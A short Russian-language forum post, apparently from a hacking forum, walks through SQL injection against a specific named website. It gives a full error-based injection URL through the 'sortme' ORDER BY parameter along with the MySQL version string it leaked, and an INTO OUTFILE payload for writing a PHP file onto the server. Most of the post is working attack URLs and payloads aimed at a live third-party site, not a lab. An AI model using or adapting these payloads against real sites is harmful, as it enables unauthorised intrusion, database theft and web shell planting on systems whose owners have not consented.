http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=pos t_subject&start=1390,1--+ - TRUE => скуля в LIMIT'e.

Такие скули можно раскрутить только если в запросе не присутствует order by.

В данной скуле Order by уже есть, т.ч. нет.

Или если у юзера есть file_priv то через такую скулю можно залиться:

limit=10,1 limit 1 into outfile '/path/filename.php' lines terminated by 'olololo'-- a

Но в другом параметре (sortme) можно скулю раскрутить через ErrorBased.

Там скуля в параметре order by.

http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=pos t_subject,(select+1+from+(select+count(0),concat(( select+version()),floor(rand(0)*2))+from+informati on_schema.tables+group+by+2+limit+1)a)--+

Duplicate entry '5.1.61-0+squeeze1-log1' for key 'group_key'

//offtop я хотел чтобы человек подумал хоть, а ты...(